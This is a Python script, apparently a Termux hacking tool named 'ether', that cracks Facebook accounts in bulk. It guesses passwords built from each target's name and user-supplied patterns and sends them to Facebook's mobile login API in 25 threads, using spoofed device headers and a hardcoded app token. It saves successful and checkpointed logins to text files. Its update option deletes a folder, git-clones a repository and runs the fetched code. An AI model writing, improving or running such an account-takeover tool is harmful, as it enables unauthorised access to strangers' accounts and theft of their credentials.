try:
    import os,sys,time,platform,datetime,random,hashlib,re,threading,json,getpass,urllib,cookielib,requests,uuid,string,subprocess
    from multiprocessing.pool import ThreadPool
    from requests.exceptions import ConnectionError
except ImportError:
    os.system("python2 ether")

from os import system
from time import sleep

# Add missing global variables
oks = []
cps = []
loop = 0
cpc = 0
okc = 0

def xox(z):
    for e in z + "\n":
        sys.stdout.write(e)
        sys.stdout.flush()
        time.sleep(0.04)

# COLORS
x = '\33[m' 
k = '\033[93m' 
h = '\x1b[1;92m' 
hh = '\033[32m' 
u = '\033[95m' 
K = '\033[95m' 
kk = '\033[33m' 
b = '\33[1;96m' 
p = '\x1b[0;34m' 

try:
    ip = requests.get('https://api.ipify.org').text.strip()
    loc = requests.get('https://api.iplocation.net/?cmd=ip-country&ip=' + ip, headers={'Referer': 'https://api.iplocation.net/', 'Content-Type': 'application/json; charset=utf-8', 'User-Agent': 'Mozilla/5.0 (Linux; Android 7.1.2; Redmi 4X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36'}).json()['country_name'].upper()
except:
    ip = "Unknown"
    loc = "Unknown"
    

agents = [
		"Mozilla/5.0 (Linux; Android 12; SM-N986U Build/SP1A.210812.016; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/103.0.5060.71 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/376.0.0.12.108;]",
		 "Mozilla/5.0 (Linux; Android 10; SM-A415F Build/RP1A.200720.012; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/103.0.5060.53 Mobile Safari/537.36 Instagram 236.0.0.20.109 Android (30/11; 420dpi; 1080x2184; samsung; SM-A415F; a41; mt6768; en_AU; 333717270)",
 	 "Mozilla/5.0 (iPhone; CPU iPhone OS 15_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/19F77 [FBAN/FBIOS;FBDV/iPhone13,3;FBMD/iPhone;FBSN/iOS;FBSV/15.5;FBSS/3;FBID/phone;FBLC/en_US;FBOP/5;FBIA/FBIOS]",
  	"Mozilla/5.0 (iPhone; CPU iPhone OS 15_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 Instagram 245.0.0.13.110 (iPhone11,8; iOS 15_4_1; en_US; en-US; scale=2.00; 828x1792; 384816942) NW/3",
  	'Mozilla/5.0 (Linux; Android 11; TECNO KG6 Build/RP1A.200720.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.210 Mobile Safari/537.36',
    'Mozilla/5.0 (Linux; Android 12; V2055A; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/87.0.4280.141 Mobile Safari/537.36 VivoBrowser/11.6.14.0',
    'Mozilla/5.0 (Linux; Android 10; CPH1823) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.71 Mobile Safari/537.36',
    'Mozilla/5.0 (Linux; Android 9; Infinix X652A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.78 Mobile Safari/537.36',  # ✅ Fix 1: Added comma
    'Mozilla/5.0 (Linux; U; Android 6.0.1; zh-cn; OPPO R9s Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.61 Mobile Safari/537.36 HeyTapBrowser/10.7.39.5',
    'Mozilla/5.0(Linux; U; Android 2.3.4; en-us; SCH-R720 Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',
    'Mozilla/5.0 (Linux; Android 5.1; P5 mini Build/LMY47I) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.91 Mobile Safari/537.36'
]

# ✅ Fix 2: Completed truncated header
header = {
    'x-fb-connection-bandwidth': str(random.randint(20000000, 30000000)), 
    'x-fb-sim-hni': str(random.randint(20000, 40000)), 
    'x-fb-net-hni': str(random.randint(20000, 40000)), 
    'x-fb-connection-quality': 'EXCELLENT', 
    'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA', 
    'user-agent': 'Dalvik/2.1.0 (Linux; U; Android 5.1.1; SM-J320F Build/LMY47V) [FBAN/FB4A;FBAV/43.0.0.29.147;FBPN/com.facebook.katana;FBLC/en_GB;FBBV/14274161;FBCR/Tele2 LT;FBMF/samsung;FBBD/samsung;FBSV/5.1.1;]'
}

randomgents = random.choice(agents)
		
headers_ = {'x-fb-connection-bandwidth': str(random.randint(20000000.0, 30000000.0)), 'x-fb-sim-hni': str(random.randint(20000, 40000)), 'x-fb-net-hni': str(random.randint(20000, 40000)), 'x-fb-connection-quality': 'EXCELLENT', 'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA', 'user-agent': randomgents, 'content-type': 'application/x-www-form-urlencoded', 'x-fb-http-engine': 'Liger'}

# ✅ Fix 3: Completed truncated user_agent				
user_agent = [
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0", 
    "Mozilla/5.0 (Linux; Android 10; SM-G973F Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/86.0.4240.198 Mobile Safari/537.36 Instagram 166.1.0.42.245 Android (29/10; 420dpi; 1080x2042; samsung; SM-G973F; beyond1; exynos9820; en_GB; 256099204)",
    "Mozilla/5.0 (Linux; Android 8.0.0; SM-G960F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36"
]

def linex():
    os.system('echo  "\n ======================================\n" | lolcat -a -d 2 -s 50')

def logo():
    os.system('echo "\n\t ╔═══╗╔═══╗╔═══╗╔═╗╔═╗ \n\t ╚╗╔╗║║╔═╗║║╔══╝╚╗╚╝╔╝ \n\t  ║║║║║╚═╝║║╚══╗ ╚╗╔╝  \n\t  ║║║║║╔╗╔╝║╔══╝ ╔╝╚╗  \n\t ╔╝╚╝║║║║╚╗║╚══╗╔╝╔╗╚╗ \n\t ╚═══╝╚╝╚═╝╚═══╝╚═╝╚═╝ \n"')

def main():
    os.system("clear")
    logo()
    print("\t\033[93;1m      MAIN MENU\x1b[0m")
    print("")
    print("\033[92;1m  [1] CRACK FILE")
    print("\033[94;1m  [2] UPDATE TOOL 06.10")
    print("\033[96;1m  [3] CHAT ME UP ON WHATSAPP \033[92;1m✘\033[91;1m✘")
    print("\033[90;1m  [0] EXIT")
    print("")
    log_sel()

def log_sel():
    sel = input("\033[93;1m  CHOOSE: \033[92;1m")
    if sel == "":
        print("\t\033[91;1m  SELECT AN OPTION STUPID -_")
        log_sel()
    elif sel == "1" or sel == "01":
        files()
    elif sel == "2" or sel == "02":
        try:
            os.system("rm -rf ether ; git clone https://github.com/chidexzy/ether ; cd ether ; cp ether /data/data/com.termux/files/home/ether ; cd ; cd ether ; rm -rf ether")
            xox("\033[92;1m\n TOOL UPDATE SUCCESSFUL 👍\n")
            os.system("python2 ether")
        except KeyboardInterrupt:
            print("\033[91;1m\n YOUR DEVICE IS NOT SUPPORTED!\n")
            main()
    elif sel == "3" or sel == "03":
        try:
            subprocess.check_output(["am", "start", "https://wa.me/qr/BLRFNOUYDCRPO1"])
        except:
            print("\033[91;1m\n WhatsApp link failed to open\n")
        main()
    elif sel == "5" or sel == "05":
        try:
            os.system("rm -rf ether ; git clone https://github.com/chidexzy/ether ; cd ether ; cp ether /data/data/com.termux/files/home/ether ; cd ; cd ether ; rm -rf ether")
            xox("\033[92;1m\n TOOL UPDATE SUCCESSFUL 👍\n")
            os.system("python2 ether")
        except KeyboardInterrupt:
            print("\033[91;1m\n YOUR DEVICE IS NOT SUPPORTED!\n")
            main()
    elif sel == "0" or sel == "00":
        xox("\n\t\033[91;1m YOUR FATHER!!! 🖕😅")
        sys.exit()
    else:
        print("")
        print("\t\033[91;1m  SELECT VALID OPTION")
        print("")
        log_sel()

def files():
    global oks, cps
    os.system("clear")
    logo()
    print("")
    file = input(' Put file path\033[1;37m: ')
    try:
        fo = open(file,'r').read().splitlines()
    except FileNotFoundError:
        print(' File location not found ')
        time.sleep(1)
        os.system('clear')
        files()
        return
    
    plist = []
    try:
        os.system('clear')
        logo()
        print(' Example : 1 , 2 ,3, 4 ,5 ,6 ,7 ,8, 9 ,****,Etc')
        ps_limit = int(input(' Put pass limit : '))
    except:
        ps_limit = 1
    
    os.system('clear')
    logo()
    print(' Example : first last,firstlast,first12345,***Etc')
    for i in range(ps_limit):
        plist.append(input(f' Put password {i+1}: '))
    
    with ThreadPool(25) as crack_submit:
        os.system('clear')
        logo()
        total_ids = str(len(fo))
        print(' Total Accounts   : '+total_ids)
        print(' \x1b[1;91mUse Flight Mode If No Results')
        for user in fo:
            try:
                ids, names = user.split('|')
                passlist = plist
                crack_submit.apply_async(ffb, (ids, names, passlist))
            except ValueError:
                print(f' Invalid format in line: {user}')
                continue
    
    print('\033[1;37m')
    print(' The process has completed')
    print(' Total OK/CP: '+str(len(oks))+'/'+str(len(cps)))
    input(' Press enter to back ')
    os.system('python2 ether')

def ffb(ids, names, passlist):
    global loop, oks, cps, okc, cpc  # ✅ Fix 4: Added okc and cpc to global declaration
    loop += 1
    sys.stdout.write('\r\x1b[1;97m[\033[1;97mCracking\033[1;97m] %s |\x1b[1;92mOK:- %s \x1b[1;97m\r'%(loop,len(oks)))
    sys.stdout.flush()
    vaugent = random.choice(agents)
    session = requests.Session()
    session.headers.update({'User-Agent': vaugent})
    try:
        first = names.split(' ')[0]
        try:
            last = names.split(' ')[1]
        except:
            last = 'Khan'
        ps = first.lower()
        ps2 = last.lower()
        for fikr in passlist:
            pas = fikr.replace('First',first).replace('Last',last).replace('first',ps).replace('last',ps2)
            data = session.get("https://b-api.facebook.com/method/auth.login?format=json&email="+ids+"&password="+pas+"&credentials_type=device_based_login_password&generate_session_cookies=1&error_detail_type=button_with_disabled&source=device_based_login&meta_inf_fbmeta=%20&currently_logged_in_userid=0&method=GET&locale=en_US&client_country_code=US&fb_api_caller_class=com.facebook.fos.headersv2.fb4aorca.HeadersV2ConfigFetchRequestHandler&access_token=350685531728|62f8ce9f74b12f84c123cc23437a4a32&fb_api_req_friendly_name=authenticate&cpl=true", headers=headers_).text
            q = json.loads(data)
            if "access_token" in q and "EAAA" in q:
                print(" \033[1;32m[EXCELLENT] "+ids+" | "+pas+"\033[0;97m")
                okc+=1
                ok = open("ether_ok.txt", "a")
                ok.write(ids+"|"+pas+"\n")
                ok.close()
                oks.append(ids+pas)
            else:
                if "www.facebook.com" in q['error_msg']:
                    print("\r \033[1;33m[CHECKPOINT] "+ids+" | "+pas+"\033[0;97m")
                    cpc+=1
                    cp = open("ether_cp.txt", "a")
                    cp.write(ids+"|"+pas+"\n")
                    cp.close()
                    cps.append(ids+pas)
            pass
    except Exception as e:
        pass

# Start the program
if __name__ == "__main__":
    main()
